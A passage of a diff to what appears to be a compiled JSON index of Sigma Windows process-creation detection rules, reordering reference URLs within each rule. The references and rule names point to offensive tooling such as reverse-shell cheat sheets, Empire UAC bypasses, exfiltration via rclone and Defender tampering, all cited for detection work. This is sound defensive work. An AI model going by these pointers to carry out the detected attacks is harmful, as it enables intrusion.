"https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", "https://github.com/Neo23x0/DLLRunner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" ], @@ -43435,8 +43435,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" ], @@ -43604,8 +43604,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://streamable.com/q2dsji", "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" ], "tags": [ @@ -43671,8 +43671,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml" ], "tags": [ @@ -43728,8 +43728,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" ], "tags": [ @@ -43901,10 +43901,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://twitter.com/0gtweet/status/1583356502340870144", + "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", "https://lolbas-project.github.io/lolbas/Binaries/Setres/", + "https://twitter.com/0gtweet/status/1583356502340870144", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" ], "tags": [ @@ -43946,8 +43946,8 @@ "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" @@ -43982,8 +43982,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" ], @@ -44017,9 +44017,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/c_APT_ure/status/939475433711722497", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" ], "tags": [ @@ -44459,8 +44459,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" ], "tags": [ @@ -44546,9 +44546,9 @@ "logsource.product": "windows", "refs": [ "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" ], "tags": [ @@ -44648,8 +44648,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" ], "tags": [ @@ -44758,8 +44758,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" ], "tags": [ @@ -44951,11 +44951,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/egre55/status/1087685529016193025", "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://twitter.com/JohnLaTwC/status/835149808817991680", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://twitter.com/JohnLaTwC/status/835149808817991680", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" ], "tags": [ @@ -45197,8 +45197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" ], "tags": [ @@ -45266,10 +45266,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" ], "tags": [ @@ -45361,8 +45361,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1168863899531132929", "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", + "https://twitter.com/cyb3rops/status/1168863899531132929", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" ], "tags": [ @@ -45387,9 +45387,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ @@ -45447,8 +45447,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -45481,10 +45481,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" ], "tags": [ @@ -45560,11 +45560,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/04/13/hot-potato/", - "https://github.com/ohpe/juicy-potato", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://github.com/ohpe/juicy-potato", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" ], "tags": [ @@ -45631,9 +45631,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.revshells.com/", "https://nmap.org/ncat/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" ], "tags": [ @@ -45699,9 +45699,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" ], "tags": [ @@ -45727,10 +45727,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" ], "tags": [ @@ -45789,9 +45789,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" ], "tags": [ @@ -45826,9 +45826,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://twitter.com/frack113/status/1555830623633375232", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" ], "tags": [ @@ -45927,9 +45927,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://isc.sans.edu/diary/22264", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" ], "tags": [ @@ -46097,11 +46097,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/885545634958385153", - "https://twitter.com/Hexacorn/status/885553465417756673", - "https://twitter.com/Hexacorn/status/885570278637678592", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/vysecurity/status/885545634958385153", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://twitter.com/Hexacorn/status/885570278637678592", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" ], "tags": [ @@ -46191,8 +46191,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://processhacker.sourceforge.io/", "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" ], @@ -46214,8 +46214,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" ], "tags": [ @@ -46295,8 +46295,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", "https://lolbas-project.github.io/lolbas/Binaries/Winget/", + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" ], "tags": [ @@ -46385,8 +46385,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" ], "tags": [ @@ -46730,9 +46730,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/oulusoyum/status/1191329746069655553", "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ @@ -46809,8 +46809,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], @@ -46861,10 +46861,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" ], "tags": [ @@ -47167,8 +47167,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", "https://twitter.com/_felamos/status/1179811992841797632", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" ], "tags": [ @@ -47235,9 +47235,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" ], "tags": [ @@ -47294,8 +47294,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", "https://twitter.com/blackorbird/status/1140519090961825792", + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" ], "tags": [ @@ -47895,8 +47895,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" ], "tags": [ @@ -47939,8 +47939,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" ], @@ -47974,8 +47974,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" ], "tags": [ @@ -47999,8 +47999,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" ], "tags": [ @@ -48050,9 +48050,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" ], "tags": [ @@ -48085,8 +48085,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://twitter.com/orange_8361/status/1518970259868626944", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" ], "tags": [ @@ -48110,12 +48110,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.joeware.net/freetools/tools/adfind/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" ], "tags": [ @@ -48194,8 +48194,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", + "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" ], "tags": [ @@ -48363,8 +48363,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.php.net/manual/en/features.commandline.php", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.php.net/manual/en/features.commandline.php", "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], @@ -48528,8 +48528,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" ], "tags": [ @@ -48587,8 +48587,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" ], "tags": [ @@ -48657,8 +48657,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" ], "tags": [ @@ -48882,14 +48882,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://twitter.com/gN3mes1s/status/941315826107510784", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" ], "tags": [ @@ -49055,11 +49055,11 @@ 